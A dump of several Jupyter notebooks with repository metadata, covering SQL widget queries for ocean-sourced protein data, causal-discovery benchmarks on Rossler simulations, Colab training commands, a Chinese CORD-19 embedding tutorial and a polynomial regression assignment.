CWS0hycjsoIL6QZRWPkVDgMCWMyapg6ATJyDcycSz2zgpmOUJ0OgADUr56kWS3LoY5lyTnEoVjpHIL4MWYBueSuJ4hUIDiWZQfYlhwW0sOWQAgGRMy5AINkMIhygXgvig5OCHolhXVyImbQZBhnzTgcMJAX13EEhVWq2RGr0BIH+g5LwnNFBsn8DQBgjJ1XjVuNq2kURkiWoCDa8BUK84msBEiNg9V0lomGAURIwJc4VT9XAAA6iEnO+lulw0oJ0mQKSCRpLjYG1AvSHIwDYCPJFvr-XprabcZCYaC1RpjQG4tqAdgORTfIfxoB42oHhhCWFmNsbWMSnQYZzJtm6xbFYM6G4KUG1pMoHqwxxASGmh2gkCoRkTBiXdegX5KDvB9g5OdshxJItGaGOJdRMBrueg5WxEAwgICYGwEM-SUXbsXj2uA3zESql2nupdKKV0PUeo6gyT6X16RAJoZQa8QChEfiYQDb7BgfpuoUGNBAKi5wg5SQDwwQOBFvXCTwOAJSHvqJm94-lxCeIVeB1OlJbUgC8L5RwahSBoG0XAEjvlwFJhvWoUEi74P1NQyGCEMg5UbQ9d5MZTaM0gDOSiQTGBc2+PVQMotmT0BeRnEwZQUBaoyrbS6IAA)", "_____no_output_____" ], [ "# Indicator", "_____no_output_____" ], [ "## Rank", "_____no_output_____" ], [ "Query:\n```sql\nSELECT \n CONCAT(rank, ' of ', max_rank) \n FROM (\n SELECT \n gid_0,\n geostore_prod, \n rank, \n MAX(rank) OVER (PARTITION BY true) AS max_rank \n FROM (\n SELECT \n gid_0,\n geostore_prod, \n RANK() OVER(ORDER BY prop DESC) as rank \n FROM (\n SELECT \n area, \n SUM(\n CASE\n WHEN item = 'Ocean-Sourced Foods' THEN value \n ELSE 0\n END)/\n NULLIF(\n SUM(\n CASE\n WHEN item = 'Grand Total' THEN value\n ELSE 0\n END),0) prop\n FROM ocn_calcs_015_blue_food_protein_supply \n WHERE year = 2018 GROUP BY area) data \n LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area \n LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 \n WHERE prop is not null AND coastal = true) ranked\nGROUP BY rank, 
geostore_prod, gid_0) max_rank\nWHERE {{geostore_env}} ILIKE '{{geostore_id}}'\n```", "_____no_output_____" ], [ "query: [https://wri-rw.carto.com/api/v2/sql?q=SELECT CONCAT(rank, ' of ', max_rank) AS value FROM (SELECT gid_0, geostore_prod,rank, MAX(rank) OVER (PARTITION BY true) AS max_rank FROM (SELECT gid_0, geostore_prod,RANK() OVER(ORDER BY prop DESC) as rank FROM (SELECT area, SUM(CASE WHEN item = 'Ocean-Sourced Foods' THEN value ELSE 0 END)/NULLIF(SUM(CASE WHEN item = 'Grand Total' THEN value ELSE 0 END),0) prop FROM ocn_calcs_015_blue_food_protein_supply WHERE year = 2018 GROUP BY area) data LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE prop is not null AND coastal = true) ranked GROUP BY rank, geostore_prod, gid_0) max_rank WHERE {{geostore_env}} ILIKE '{{geostore_id}}'](https://wri-rw.carto.com/api/v2/sql?q=SELECT%20CONCAT(rank,%20%27%20of%20%27,%20max_rank)%20AS%20value%20FROM%20(SELECT%20gid_0,%20geostore_prod,rank,%20MAX(rank)%20OVER%20(PARTITION%20BY%20true)%20AS%20max_rank%20FROM%20(SELECT%20gid_0,%20geostore_prod,RANK()%20OVER(ORDER%20BY%20prop%20DESC)%20as%20rank%20FROM%20(SELECT%20area,%20SUM(CASE%20WHEN%20item%20=%20%27Ocean-Sourced%20Foods%27%20THEN%20value%20ELSE%200%20END)/NULLIF(SUM(CASE%20WHEN%20item%20=%20%27Grand%20Total%27%20THEN%20value%20ELSE%200%20END),0)%20prop%20FROM%20ocn_calcs_015_blue_food_protein_supply%20WHERE%20year%20=%202018%20GROUP%20BY%20area)%20data%20LEFT%20JOIN%20ow_aliasing_countries%20AS%20alias%20ON%20alias.alias%20=%20data.area%20LEFT%20JOIN%20gadm36_0%20gadm%20ON%20alias.iso%20=%20gadm.gid_0%20WHERE%20prop%20is%20not%20null%20AND%20coastal%20=%20true)%20ranked%20GROUP%20BY%20rank,%20geostore_prod,%20gid_0)%20max_rank%20WHERE%20gid_0%20ILIKE%20%27MEX%27)", "_____no_output_____" ], [ "## Value", "_____no_output_____" ], [ "Description: Blue protein as a proportion of total protein", "_____no_output_____" ], [ "Query:\n``` sql\nSELECT SUM(ocean_value)/NULLIF(SUM(total_value),0)*100 AS value FROM (SELECT area, year, item, CASE\n\tWHEN item = 'Ocean-Sourced Foods' THEN value \n ELSE 0\n END ocean_value,\nCASE\n WHEN item = 'Grand Total' THEN value\n ELSE 0\n END total_value\nFROM ocn_calcs_015_blue_food_protein_supply\nWHERE year = 2018) data\nLEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area \nLEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 \nWHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}'\nGROUP by area\n```", "_____no_output_____" ], [ "query: [https://wri-rw.carto.com/api/v2/sql?q=SELECT SUM(ocean_value)/NULLIF(SUM(total_value),0)*100 AS value FROM (SELECT area, year, item, CASE WHEN item = 'Ocean-Sourced Foods' THEN value ELSE 0 END ocean_value, CASE WHEN item = 'Grand Total' THEN value ELSE 0 END total_value FROM ocn_calcs_015_blue_food_protein_supply WHERE year = 2018) data LEFT JOIN ow_aliasing_countries AS alias ON alias.alias = data.area LEFT JOIN gadm36_0 gadm ON alias.iso = gadm.gid_0 WHERE gadm.{{geostore_env}} ILIKE '{{geostore_id}}' GROUP by 
area](https://wri-rw.carto.com/api/v2/sql?q=SELECT%20SUM(ocean_value)/NULLIF(SUM(total_value),0)*100%20AS%20value%20FROM%20(SELECT%20area,%20year,%20item,%20CASE%20WHEN%20item%20=%20%27Ocean-Sourced%20Foods%27%20THEN%20value%20ELSE%200%20END%20ocean_value,%20CASE%20WHEN%20item%20=%20%27Grand%20Total%27%20THEN%20value%20ELSE%200%20END%20total_value%20FROM%20ocn_calcs_015_blue_food_protein_supply%20WHERE%20year%20=%202018)%20data%20LEFT%20JOIN%20ow_aliasing_countries%20AS%20alias%20ON%20alias.alias%20=%20data.area%20LEFT%20JOIN%20gadm36_0%20gadm%20ON%20alias.iso%20=%20gadm.gid_0%20WHERE%20gadm.gid_0%20ILIKE%20%27MEX%27%20GROUP%20by%20area)", "_____no_output_____" ], [ "## RW API", "_____no_output_____" ], [ "- [back office](https://resourcewatch.org/admin/data/widgets/731293a0-b92f-4804-b59c-69a1d794ad73/edit?dataset=9e1b3cad-db6f-44b0-b6fb-048df7b6c680)\n- parent dataset [foo_061](https://resourcewatch.org/data/explore/9e1b3cad-db6f-44b0-b6fb-048df7b6c680) \n- dataset id ```9e1b3cad-db6f-44b0-b6fb-048df7b6c680```\n- widget id: ```731293a0-b92f-4804-b59c-69a1d794ad73```", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown", "markdown" ] ]
cb1edf40849d51dd7c528c68d729e4cafd0f666e
7,343
ipynb
Jupyter Notebook
experiments/Paper_experiments_Rossler.ipynb
vanderschaarlab/Graphical-modelling-continuous-time
6020e6859d8eec08d3d216e347f2458c67036a91
[ "MIT" ]
1
2022-02-13T18:36:30.000Z
2022-02-13T18:36:30.000Z
experiments/Paper_experiments_Rossler.ipynb
vanderschaarlab/Graphical-modelling-continuous-time
6020e6859d8eec08d3d216e347f2458c67036a91
[ "MIT" ]
1
2022-03-24T21:54:02.000Z
2022-03-24T21:54:02.000Z
experiments/Paper_experiments_Rossler.ipynb
alexisbellot/Graphical-modelling-continuous-time
6020e6859d8eec08d3d216e347f2458c67036a91
[ "MIT" ]
null
null
null
29.971429
109
0.514367
[ [ [ "Rossler performance experiments", "_____no_output_____" ] ], [ [ "import numpy as np\nimport torch\nimport sys\n\nsys.path.append(\"../\")\nimport utils as utils\nimport NMC as models\nimport importlib", "_____no_output_____" ] ], [ [ "## SVAM", "_____no_output_____" ] ], [ [ "# LiNGAM / SVAM performance with sparse data\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\nfor p in [10, 50]:\n perf = []\n for i in range(20):\n # Simulate data\n T = 1000\n num_points = T\n data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)\n\n # format for NeuralODE\n data = torch.from_numpy(data[:, None, :].astype(np.float32))\n\n from benchmarks.lingam_benchmark import lingam_method\n\n importlib.reload(utils)\n graph = lingam_method(data.squeeze().detach())\n perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr\n\n print(\"Means and standard deviations for TPR, FDR and AUC with\", p, \"dimensions\")\n print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))", "Means and standard deviations for TPR, FDR and AUC with 10 dimensions\n[0.77368421 0.53953499 0.49996751] [0.10273274 0.06081473 0.02438485]\nMeans and standard deviations for TPR, FDR and AUC with 50 dimensions\n[0.59141414 0.66847463 0.49049291] [0.10153776 0.06151317 0.02785143]\n" ] ], [ [ "# DCM", "_____no_output_____" ] ], [ [ "# DCM performance with sparse data\nfor p in [10, 50]:\n perf = []\n for i in range(10):\n # Simulate data\n T = 1000\n num_points = T\n data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)\n\n from benchmarks.DCM import DCM_full\n\n graph = DCM_full(data, lambda1=0.001, s=4, w_threshold=0.1)\n # plt.matshow(abs(graph),cmap='Reds')\n # plt.colorbar()\n # plt.show()\n perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr\n\n print(\"Means and standard deviations for TPR, FDR and AUC with\", p, \"dimensions\")\n print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))", "Means and standard deviations for TPR, FDR and AUC with 10 dimensions\n[0.779 0.452 0.864] [0.135 0.115 0.092]\nMeans and standard deviations for TPR, FDR and AUC with 50 dimensions\n[0.97 0.716 0.983] [2.220e-16 1.151e-01 8.450e-04]\n" ] ], [ [ "# PCMCI", "_____no_output_____" ] ], [ [ "# pcmci performance with sparse data\nfor p in [10, 50]:\n perf = []\n for i in range(5):\n # Simulate data\n T = 1000\n num_points = T\n data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)\n\n from benchmarks.pcmci import pcmci\n\n importlib.reload(utils)\n graph = pcmci(data)\n perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr\n\n print(\"Means and standard deviations for TPR, FDR and AUC with\", p, \"dimensions\")\n print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))", "Could not import packages for CMIknn and GPDC estimation\nCould not import r-package RCIT\nMeans and standard deviations for TPR, FDR and AUC with 10 dimensions\n[0.768 0.76 0.597] [0.123 0.041 0.083]\nMeans and standard deviations for TPR, FDR and AUC with 50 dimensions\n[0.685 0.925 0.668] [0.068 0.006 0.018]\n" ] ], [ [ "## NGM", "_____no_output_____" ] ], [ [ "# NGM performance with sparse data\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\nfor p in [10, 50]:\n perf = []\n for i in range(5):\n # Simulate data\n T = 1000\n num_points = T\n data, GC = utils.simulate_rossler(p=p, a=0, T=T, delta_t=0.1, sd=0.05, burn_in=0, sigma=0.0)\n\n # 
format for NeuralODE\n data = torch.from_numpy(data[:, None, :])\n\n import NMC as models\n\n func = models.MLPODEF(dims=[p, 12, 1], GL_reg=0.1)\n\n # GL training\n models.train(func, data, n_steps=2000, plot=False, plot_freq=20)\n # AGL training\n # weights = func.group_weights()\n # func.GL_reg *= (1 / weights)\n # func.reset_parameters()\n # models.train(func,data,n_steps=1000,plot = True, plot_freq=20)\n graph = func.causal_graph(w_threshold=0.1)\n perf.append(utils.compare_graphs(GC, graph)) # tpr, fdr\n\n print(\"Means and standard deviations for TPR, FDR and AUC with\", p, \"dimensions\")\n print(np.mean(np.reshape(perf, (-1, 3)), axis=0), np.std(np.reshape(perf, (-1, 3)), axis=0))", "Means and standard deviations for TPR, FDR and AUC with 10 dimensions\n[0.863 0. 0.932] [0.026 0. 0.013]\nMeans and standard deviations for TPR, FDR and AUC with 50 dimensions\n[0.974 0.11 0.987] [0.005 0.043 0.002]\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1eeecc032a17b6948b1d20d2ce0f4a2660c28d
3,460
ipynb
Jupyter Notebook
colab_notebook_main.ipynb
mueedhafiz1982/point-cloud-generation-from-2D_image
a0067d369f0824846a90948d50522e05bf2742c4
[ "MIT" ]
null
null
null
colab_notebook_main.ipynb
mueedhafiz1982/point-cloud-generation-from-2D_image
a0067d369f0824846a90948d50522e05bf2742c4
[ "MIT" ]
null
null
null
colab_notebook_main.ipynb
mueedhafiz1982/point-cloud-generation-from-2D_image
a0067d369f0824846a90948d50522e05bf2742c4
[ "MIT" ]
null
null
null
32.641509
158
0.553468
[ [ [ "from google.colab import drive\ndrive.mount('/content/drive')", "_____no_output_____" ], [ "!wget https://cmu.box.com/shared/static/s4lkm5ej7sh4px72vesr17b1gxam4hgy.gz", "_____no_output_____" ], [ "%tensorflow_version 1.x\n!pip install numpy==1.19.5\n\nimport tarfile\ntar = tarfile.open(\"/content/drive/MyDrive/s4lkm5ej7sh4px72vesr17b1gxam4hgy.gz\")\ntar.extractall()\ntar.close()\n\n\"Copy trans_fuse8.npy from original project folder to \\data\\ folder of current project\"", "_____no_output_____" ], [ "!python3 /content/drive/MyDrive/code/pretrain.py --group=0 --model=orig-pre --arch=original --lr=1e-2 --toIt=100000\n!python3 /content/drive/MyDrive/code/train.py --group=0 --model=orig-ft --arch=original --load=orig-pre_it100000 --lr=1e-5 --fromIt=0 --toIt=4000\n!python3 /content/drive/MyDrive/code/evaluate.py --group=0 --arch=original --load=orig-ft_it2000\n!python3 /content/drive/MyDrive/code/evaluate_dist.py --group=0 --load=orig-ft_it2000", "_____no_output_____" ], [ "!python3 /content/drive/MyDrive/code/pretrainv4.py --group=0 --model=orig-pre --arch=original --lr=5e-3 --toIt=100000\n!python3 /content/drive/MyDrive/code/train.py --group=0 --model=orig-ft --arch=original --load=orig-pre_it100000 --lr=5e-6 --fromIt=0 --toIt=4000\n!python3 /content/drive/MyDrive/code/evaluate.py --group=0 --arch=original --load=orig-ft_it400\n!python3 /content/drive/MyDrive/code/evaluate_dist.py --group=0 --load=orig-ft_it400", "_____no_output_____" ], [ "!python3 /content/drive/MyDrive/code/pretrainv8.py --group=0 --model=orig-pre --arch=original --lr=5e-3 --toIt=100000\n!python3 /content/drive/MyDrive/code/train.py --group=0 --model=orig-ft --arch=original --load=orig-pre_it100000 --lr=5e-6 --fromIt=0 --toIt=4000\n!python3 /content/drive/MyDrive/code/evaluate.py --group=0 --arch=original --load=orig-ft_it2000\n!python3 /content/drive/MyDrive/code/evaluate_dist.py --group=0 --load=orig-ft_it2000", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code" ] ]
cb1f02e4f3eb8536bb585d2622eab3270214f24d
13,226
ipynb
Jupyter Notebook
site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb
NarimaneHennouni/docs-l10n
39a48e0d5aa34950e29efd5c1f111c120185e9d9
[ "Apache-2.0" ]
2
2021-03-12T18:02:29.000Z
2021-06-18T19:32:41.000Z
site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb
NarimaneHennouni/docs-l10n
39a48e0d5aa34950e29efd5c1f111c120185e9d9
[ "Apache-2.0" ]
null
null
null
site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb
NarimaneHennouni/docs-l10n
39a48e0d5aa34950e29efd5c1f111c120185e9d9
[ "Apache-2.0" ]
null
null
null
32.258537
276
0.521246
[ [ [ "#### Copyright 2019 The TensorFlow Hub Authors.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");", "_____no_output_____" ] ], [ [ "# Copyright 2019 The TensorFlow Hub Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================", "_____no_output_____" ] ], [ [ "# 探索 TF-Hub CORD-19 Swivel 嵌入向量\n", "_____no_output_____" ], [ "<table class=\"tfo-notebook-buttons\" align=\"left\">\n <td><a target=\"_blank\" href=\"https://tensorflow.google.cn/hub/tutorials/cord_19_embeddings_keras\"><img src=\"https://tensorflow.google.cn/images/tf_logo_32px.png\">在 TensorFlow.org 上查看 </a></td>\n <td><a target=\"_blank\" href=\"https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb\"><img src=\"https://tensorflow.google.cn/images/colab_logo_32px.png\">在 Google Colab 中运行 </a></td>\n <td><a target=\"_blank\" href=\"https://github.com/tensorflow/docs-l10n/blob/master/site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb\"><img src=\"https://tensorflow.google.cn/images/GitHub-Mark-32px.png\">在 GitHub 中查看源代码</a></td>\n <td><a href=\"https://storage.googleapis.com/tensorflow_docs/hub/examples/colab/cord_19_embeddings_keras.ipynb\">{img1下载笔记本</a></td>\n</table>", "_____no_output_____" ], [ "TF-Hub (https://tfhub.dev/tensorflow/cord-19/swivel-128d/3) 上的 CORD-19 Swivel 文本嵌入向量模块旨在支持研究员分析与 COVID-19 相关的自然语言文本。这些嵌入针对 [CORD-19 数据集](https://pages.semanticscholar.org/coronavirus-research)中文章的标题、作者、摘要、正文文本和参考文献标题进行了训练。\n\n在此 Colab 中,我们将进行以下操作:\n\n- 分析嵌入向量空间中语义相似的单词\n- 使用 CORD-19 嵌入向量在 SciCite 数据集上训练分类器\n", "_____no_output_____" ], [ "## 设置\n", "_____no_output_____" ] ], [ [ "import functools\nimport itertools\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\n\nimport tensorflow as tf\n\nimport tensorflow_datasets as tfds\nimport tensorflow_hub as hub\n\nfrom tqdm import trange", "_____no_output_____" ] ], [ [ "# 分析嵌入向量\n\n首先,我们通过计算和绘制不同术语之间的相关矩阵来分析嵌入向量。如果嵌入向量学会了成功捕获不同单词的含义,则语义相似的单词的嵌入向量应相互靠近。我们来看一些与 COVID-19 相关的术语。", "_____no_output_____" ] ], [ [ "# Use the inner product between two embedding vectors as the similarity measure\ndef plot_correlation(labels, features):\n corr = np.inner(features, features)\n corr /= np.max(corr)\n sns.heatmap(corr, xticklabels=labels, yticklabels=labels)\n\n# Generate embeddings for some terms\nqueries = [\n # Related viruses\n 'coronavirus', 'SARS', 'MERS',\n # Regions\n 'Italy', 'Spain', 'Europe',\n # Symptoms\n 'cough', 'fever', 'throat'\n]\n\nmodule = hub.load('https://tfhub.dev/tensorflow/cord-19/swivel-128d/3')\nembeddings = module(queries)\n\nplot_correlation(queries, embeddings)", "_____no_output_____" ] ], [ [ "可以看到,嵌入向量成功捕获了不同术语的含义。每个单词都与其所在簇的其他单词相似(即“coronavirus”与“SARS”和“MERS”高度相关),但与其他簇的术语不同(即“SARS”与“Spain”之间的相似度接近于 0)。\n\n现在,我们来看看如何使用这些嵌入向量解决特定任务。", "_____no_output_____" ], [ "## SciCite:引用意图分类\n\n本部分介绍了将嵌入向量用于下游任务(如文本分类)的方法。我们将使用 
The [SciCite dataset](https://tensorflow.google.cn/datasets/catalog/scicite) in TensorFlow Datasets classifies citation intents in academic papers. Given a sentence with a citation from an academic paper, classify the main intent of the citation as either background information, use of methods, or comparing results.", "_____no_output_____" ] ], [ [ "builder = tfds.builder(name='scicite')\nbuilder.download_and_prepare()\ntrain_data, validation_data, test_data = builder.as_dataset(\n    split=('train', 'validation', 'test'),\n    as_supervised=True)", "_____no_output_____" ], [ "#@title Let's take a look at a few labeled examples from the training set\nNUM_EXAMPLES = 10#@param {type:\"integer\"}\n\nTEXT_FEATURE_NAME = builder.info.supervised_keys[0]\nLABEL_NAME = builder.info.supervised_keys[1]\n\ndef label2str(numeric_label):\n  m = builder.info.features[LABEL_NAME].names\n  return m[numeric_label]\n\ndata = next(iter(train_data.batch(NUM_EXAMPLES)))\n\n\npd.DataFrame({\n    TEXT_FEATURE_NAME: [ex.numpy().decode('utf8') for ex in data[0]],\n    LABEL_NAME: [label2str(x) for x in data[1]]\n})", "_____no_output_____" ] ], [ [ "## Training a citation intent classifier\n\nWe will use Keras to train a classifier on the [SciCite dataset](https://tensorflow.google.cn/datasets/catalog/scicite). Let's build a model which uses the CORD-19 embeddings with a classification layer on top.", "_____no_output_____" ] ], [ [ "#@title Hyperparameters { run: \"auto\" }\n\nEMBEDDING = 'https://tfhub.dev/tensorflow/cord-19/swivel-128d/3' #@param {type: \"string\"}\nTRAINABLE_MODULE = False #@param {type: \"boolean\"}\n\nhub_layer = hub.KerasLayer(EMBEDDING, input_shape=[], \n                           dtype=tf.string, trainable=TRAINABLE_MODULE)\n\nmodel = tf.keras.Sequential()\nmodel.add(hub_layer)\nmodel.add(tf.keras.layers.Dense(3))\nmodel.summary()\nmodel.compile(optimizer='adam',\n              loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n              metrics=['accuracy'])", "_____no_output_____" ] ], [ [ "## Train and evaluate the model\n\nLet's train and evaluate the model to see how it performs on the SciCite task.", "_____no_output_____" ] ], [ [ "EPOCHS = 35#@param {type: \"integer\"}\nBATCH_SIZE = 32#@param {type: \"integer\"}\n\nhistory = model.fit(train_data.shuffle(10000).batch(BATCH_SIZE),\n                    epochs=EPOCHS,\n                    validation_data=validation_data.batch(BATCH_SIZE),\n                    verbose=1)", "_____no_output_____" ], [ "from matplotlib import pyplot as plt\ndef display_training_curves(training, validation, title, subplot):\n  if subplot%10==1: # set up the subplots on the first call\n    plt.subplots(figsize=(10,10), facecolor='#F0F0F0')\n    plt.tight_layout()\n  ax = plt.subplot(subplot)\n  ax.set_facecolor('#F8F8F8')\n  ax.plot(training)\n  ax.plot(validation)\n  ax.set_title('model '+ title)\n  ax.set_ylabel(title)\n  ax.set_xlabel('epoch')\n  ax.legend(['train', 'valid.'])", "_____no_output_____" ], [ "display_training_curves(history.history['accuracy'], history.history['val_accuracy'], 'accuracy', 211)\ndisplay_training_curves(history.history['loss'], history.history['val_loss'], 'loss', 212)", "_____no_output_____" ] ], [ [ "## Evaluate the model\n\nLet's see how the model performs. Two values will be returned: loss (a number which represents our error, where lower values are better) and accuracy.", "_____no_output_____" ] ], [ [ "results = model.evaluate(test_data.batch(512), verbose=2)\n\nfor name, value in zip(model.metrics_names, results):\n  print('%s: %.3f' % (name, value))", "_____no_output_____" ] ], [ [ "We can see that the loss quickly decreases while the accuracy rapidly increases. Let's plot some examples to check how the predictions relate to the true labels:", "_____no_output_____" ] ], [ [ "prediction_dataset = next(iter(test_data.batch(20)))\n\nprediction_texts = [ex.numpy().decode('utf8') for ex in prediction_dataset[0]]\nprediction_labels = [label2str(x) for x in prediction_dataset[1]]\n\npredictions = [label2str(x) for x in model.predict_classes(prediction_texts)]\n\n\npd.DataFrame({\n    TEXT_FEATURE_NAME: prediction_texts,\n    LABEL_NAME: prediction_labels,\n    'prediction': predictions\n})", "_____no_output_____" ] ], [ [ 
"We can see that for this random sample, the model predicts the correct label most of the time, which indicates that it can embed scientific sentences pretty well.", "_____no_output_____" ], [ "# Next steps\n\nNow that you have learned more about the CORD-19 Swivel embeddings from TF-Hub, we encourage you to participate in the CORD-19 Kaggle competition to contribute to gaining scientific insights from COVID-19 related academic texts.\n\n- Participate in the [CORD-19 Kaggle Challenge](https://www.kaggle.com/allen-institute-for-ai/CORD-19-research-challenge)\n- Learn more about the [COVID-19 Open Research Dataset (CORD-19)](https://pages.semanticscholar.org/coronavirus-research)\n- See the documentation and find out more about the TF-Hub embeddings at https://tfhub.dev/tensorflow/cord-19/swivel-128d/3\n- Explore the CORD-19 embedding space with the [TensorFlow Embedding Projector](http://projector.tensorflow.org/?config=https://storage.googleapis.com/tfhub-examples/tensorflow/cord-19/swivel-128d/3/tensorboard/projector_config.json)", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ] ]
cb1f07b61aadd8491ac93443b861c8c3ad041939
149,745
ipynb
Jupyter Notebook
Jiang_Assignment_1/Jiang_Assignment_1.ipynb
snowhite2018/Leren
4ee88113cf4313b2ba1f3f349369e63f0f0826a3
[ "MIT" ]
null
null
null
Jiang_Assignment_1/Jiang_Assignment_1.ipynb
snowhite2018/Leren
4ee88113cf4313b2ba1f3f349369e63f0f0826a3
[ "MIT" ]
null
null
null
Jiang_Assignment_1/Jiang_Assignment_1.ipynb
snowhite2018/Leren
4ee88113cf4313b2ba1f3f349369e63f0f0826a3
[ "MIT" ]
null
null
null
203.734694
25,461
0.892457
[ [ [ "# Polynomial Regression and Cross Validation\n\nFor the first assignment we will do something that might seem familiar from *Probability Theory for Machine Learning*; try to fit a polynomial function to a provided dataset. Fitting a function is a quintessential example of *supervised learning*, specifically *regression*, making it a great place to start using machines to learn about *machine learning*. There are several concepts here that are applicable to lots of *supervised learning* algorithms, so it will be good to cover them in a familiar context first.\n\nThe notion of a *cost function* will be introduced here, which describes how well a given model fits the provided data. This function can then be minimized in several different ways, depending on complexity of the model and associated cost function, e.g. using *gradient descent* to iteratively approach the minimum or computing the minimum directly using an analytic method, both of which you may have seen some version of before.\n\nWe will start with the most basic model (linear) and compute the parameters that minimize the cost function directly, based on the derivate. It is important that you try and comprehend what you are doing in this most basic version (instead of just blindly trying to implement functions until they seem to work), as it will help you understand the more complex models that use the same principles later on. This means actually **watching the linked videos** and computing the partial derivates yourself to verify you understand all of the steps. \n\nThe other common concept introduced is model selection using *cross validation*. In this assignment it will be used to determine the degree of the polynomial we are fitting. Both cross validation for model selection and minizing a the cost function to achieve the best possible fit, are used in many other supervised models, like for example *neural networks*.\n\n## Material\n\nThe material for this assignment is based on sections **2.6 - 2.8** and **4.6 - 4.8** of the book *[Introduction to Machine Learning](https://www.cmpe.boun.edu.tr/~ethem/i2ml3e/)* by Ethem Alpaydin. In addition, there will be links to videos from Andrew Ng's *[Machine Learning course on Coursera](https://www.coursera.org/learn/machine-learning)* to provide some extra explanations and help create intuitions.\n\nGenerally speaking, using built-in functions will be fine for this course, but for this assignment you **may not** use any of the polynomial functions listed [here](https://docs.scipy.org/doc/numpy/reference/routines.polynomials.poly1d.html) or other built-in polynomial solution methods. You can of course use them to check your own implementations work correctly.\n\nIn total there are *27* points available in this exercise. Below are some imports to get your started. You do not need to add any code for this cell to work, just make sure you run the cell to actually import the libraries in your notebook.\n", "_____no_output_____" ] ], [ [ "%matplotlib inline\n\nimport numpy as np\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\nfrom IPython.display import YouTubeVideo", "_____no_output_____" ] ], [ [ "## Loading the data [1 pt]\n\nWrite a function to read the data stored in the file `points.csv` and convert it to a *Numpy* array. Each line in the file is a data point consisting of an **x**-value and **r**-value, separated by a comma. 
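For instance (hypothetical values, only to illustrate the format), the first couple of lines of the file might look like:\n\n```\n-2.35,14.1\n0.87,-3.2\n```\n\n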
You could use Numpy's [loadtxt](https://docs.scipy.org/doc/numpy/reference/generated/numpy.loadtxt.html), or any other method of your choice to read csv-files and convert that to the correct type.\n\nTest your function and print the resulting array to make sure you know what the data looks like.", "_____no_output_____" ] ], [ [ "# YOUR SOLUTION HERE\ndata = np.loadtxt('points.csv', delimiter=',')\ndata", "_____no_output_____" ] ], [ [ "## Plotting the points [2 pt]\n\nWrite a function `split_X_r` to separate your `data` into an X matrix and a R matrix using [slicing](https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html).\n\nUsing both vectors, create a graph containing the plotted points you just read from the file. For this you can use the *matplotlib* functions [plot](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.plot) and [show](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.show). A plot of data should be visible below your code. HINT: [You can check the shapes](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.shape.html) of X and R, they should both be (30,1).", "_____no_output_____" ] ], [ [ "def split_X_R(data):\n # YOUR SOLUTION HERE\n X = np.array([data[:,0]]).T\n R = np.array([data[:,1]]).T\n return X, R\n# YOUR SOLUTION HERE\nX, R = split_X_R(data)\nplt.scatter(X, R)\nplt.show()", 